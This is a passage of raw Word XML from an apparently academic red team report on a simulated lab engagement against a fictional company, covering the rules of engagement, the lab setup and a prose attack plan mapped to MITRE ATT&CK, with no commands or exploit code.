      <w:r w:rsidRPr="00BE46BA">
        <w:t>cyber attacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve"> and possible data breaches, which might lead to financial loss, reputational loss, and regulatory fines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12504ADA" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>In order to address these risks, it is advisable that ABCD Ltd adopts a layered security strategy. Key recommendations include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D544013" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Regular patching and vulnerability management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142AD932" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Strong authentication mechanisms, including multi-factor authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADB00CC" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Deployment of monitoring solutions such as SIEM and endpoint detection tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBA5D56" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Implementation of least privilege access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9B942B" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Adoption of data protection and data loss prevention measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11900CFE" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Finally, the red team engagement also shows that even rather simple vulnerabilities and misconfigurations may be used to create a large impact. By addressing the weaknesses identified, ABCD Ltd will be able to improve its security posture and increase its resilience to real-world cyber threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609E7425" w14:textId="1C957824" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DA9711" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc228059715"/>
      <w:bookmarkStart w:id="74" w:name="_Toc228127132"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="11E24909" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Red teaming and penetration testing are essential elements of contemporary cybersecurity, as they allow organisations to detect and address vulnerabilities early before they can be exploited by malicious actors. Red team engagements, unlike the traditional vulnerability assessment, are realistic attack simulations in which the attacker emulates the tactics, techniques and procedures (TTPs) of adversaries. This offers a holistic picture of the defensive abilities of an organisation, such as detection, response, and resilience (MITRE, 2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31189A4A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t xml:space="preserve">This report presents a red team engagement in a simulated environment for ABCD Ltd, a medium-sized organisation that offers web-based retail services and internal corporate systems. This assessment was aimed at assessing the security posture of the organisation by simulating a multi-stage </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>cyber attack</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>. It was engaged in discovering the vulnerability of both the externally accessible services and the internal environment, and then exploiting it, attempting to gain privileges, and steal data (Kim and Solomon, 2018).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E3CF51" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The work was carried out in a controlled and closed virtual laboratory setting to allow compliance with ethical principles and avoid any interference with the real-world systems. The results of the assessment should be used to outline the main security vulnerabilities and give an idea of possible risks that may interfere with the business processes and data confidentiality.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19952660" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc228059716"/>
      <w:bookmarkStart w:id="76" w:name="_Toc228127133"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Rules of Engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="09EE0373" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The rules of engagement (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>RoE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>) specify the scope, limits, and operational parameters of the red team assessment. These regulations make sure that all activities are carried out in an ethical, safe and within limits that are authorised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B070CB3" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>This engagement was limited to a virtualised lab environment that was a simulation of the infrastructure of ABCD Ltd. The systems under scope were a Linux-based web server (Metasploitable2), an internal Windows 7 system, and a Kali Linux attacker system. All systems were set up in an isolated network to avoid unwanted interaction with other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287EF22A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Allowed actions were reconnaissance, vulnerability scanning, exploitation of known vulnerabilities, access using credentials, and controlled data exfiltration. These activities were conducted just to achieve academic and assessment purposes. Use of automated tools like Nmap and Metasploit was allowed, provided that the use was within the scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5969144E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Specifically outlawed activities included: denial of service (DoS) attacks, destructive testing, altering system configurations outside of testing needs, and any contact with real-world or external systems. Also, no long-term or regular access points were preserved during the testing (Conti et al., 2018).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3CEA80" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>All the tests were performed under the supposition of complete authorisation in the lab. Ethical considerations were followed to the letter, and the engagement did not violate professional cybersecurity standards. A kill-switch strategy was presumed, with testing being stopped on the spot should there be unwanted system instability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFCF522" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc228059717"/>
      <w:bookmarkStart w:id="78" w:name="_Toc228127134"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Lab Environment Design</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
      <w:bookmarkEnd w:id="78"/>
    </w:p>
    <w:p w14:paraId="595501E0" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The lab setup was configured to be a simplified corporate network infrastructure to allow a controlled red team engagement to be carried out. The environment was composed of three virtual machines, each of which simulated a particular role on the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D35D720" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Kali Linux, a popular penetration testing platform with a complete set of offensive security tools, was used to implement the attacker machine. This was the system that was used to do reconnaissance, exploitation and post-exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058ABDEC" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:lastRenderedPageBreak/>
        <w:t>The initial target system was a Linux-based web server with Metasploitable2. This machine was also deliberately vulnerable and supported various insecure services, which was why it was ideal to demonstrate the initial access by exploiting publicly exposed vulnerabilities. It was the external infrastructure of the organisation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A4AB4D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The second target system was a Windows 7 system, which is an internal corporate endpoint. To create a simulation of a poorly secured internal environment, this system was set up with few security controls, such as weak authentication credentials and disabled firewall settings. Windows 7 was chosen with purpose since it has been known to be vulnerable and does not have current security features, which is why it would be suitable for showing the privilege escalation attempts and lateral movement methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664C7506" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The host-only configuration was used to connect all the virtual machines on one isolated network, providing a safe method of communication between systems and at the same time, avoiding any outside access. This configuration enabled the attacker machine to communicate with target systems within a controlled environment to simulate a real-world attack environment without risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E324F08" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The architecture of the lab environment is given in a network diagram given below. The design was such that the engagement would be able to replicate the model of an entire attack lifecycle, including external reconnaissance, internal compromise, and data exfiltration, and remain safe and reproducible (Scarfone and Mell, 2017).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0EB64F" w14:textId="25F8B0DB" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B876FFC" wp14:editId="0235EBB2">
            <wp:extent cx="3378200" cy="3981963"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1327136578" name="Picture 28"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7" descr="PlantUML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8965" cy="3982865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E74A45A"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w:t>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>: Architecture of VM Lab setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD1FE9D" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>(Source: By Author)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7221B8C8" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc228059718"/>
      <w:bookmarkStart w:id="80" w:name="_Toc228127135"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Threat Emulation Plan</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
      <w:bookmarkEnd w:id="80"/>
    </w:p>
    <w:p w14:paraId="12BAB24A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc228059719"/>
      <w:bookmarkStart w:id="82" w:name="_Toc228127136"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:lastRenderedPageBreak/>
        <w:t>4.1 Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="1F568E70" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The threat emulation plan was created to recreate an authentic adversarial campaign against the virtualised environment of ABCD Ltd. The strategy adheres to a lifecycle of attack, simulating typical tactics, techniques, and procedures (TTPs) that are present in actual cyber-attacks. The goal was to emulate the process of an outside attacker accessing the network, breaching its security, and eventually stealing sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A31216" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The attack plan was planned as a sequence of stages and goal-based and would involve reconnaissance, followed by attempts to exploit, gain privileges, conduct lateral movement, and exfiltrate data. All stages of the attack were correlated with the MITRE ATT&amp;CK framework to provide standardisation and to prove the clear understanding of adversarial behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F9C70F" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc228059720"/>
      <w:bookmarkStart w:id="84" w:name="_Toc228127137"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>4.2 Attack Lifecycle and Methodology</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>
    </w:p>
    <w:p w14:paraId="315667F6" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The attack that was emulated was broken down into the following phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADF1637" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The attacker engaged in active scanning to determine live hosts and services disclosed in the network. This stage aimed at collecting data like IPs, ports that were open, and services that were running (MITRE, 2024).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64319E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial Access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD05AFC" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>An initial foothold was obtained by exploiting a vulnerable service on the web server (Metasploitable2). This is an exploitation of a publicly accessible system that is one of the most frequent entry points for attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3F2E32" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDBF3ED" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Once successfully exploited, the system was executed with commands to gain control and verify access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5029BB0A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Privilege Escalation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF956B5" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The attacker tried to gain privileges on the compromised systems. The attempt at gaining full administrative access on the Windows system was unsuccessful, but the experiment proved that privilege management was significant (Conti et al., 2018).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5780430E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Credential Access and Lateral Movement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E99601A" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>Authentication to the internal Windows system was done by using valid credentials over SMB. This allowed the attacker to list common resources and model subsequent movement over the network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08B47E" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Data Collection and Exfiltration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220100BF" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="005036FB">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The internal system was identified as having sensitive data, and the data was exfiltrated through SMB-based file transfer. This step illustrates the possible business effect of a successful compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8650FE" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="85" w:name="_Toc228059721"/>
      <w:bookmarkStart w:id="86" w:name="_Toc228127138"/>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>4.3 MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="0ADDDD32" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE46BA">
        <w:t>The attack phases were mapped to the MITRE ATT&amp;CK Enterprise framework as follows:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2552"/>
        <w:gridCol w:w="4178"/>
        <w:gridCol w:w="2147"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w14:paraId="5ACD4ED0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C7B6E20" w14:textId="77777777" w:rsidR="00BE46BA" w:rsidRPr="00BE46BA" w:rsidRDefault="00BE46BA" w:rsidP="00BE46BA">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BE46BA">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Attack Phase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
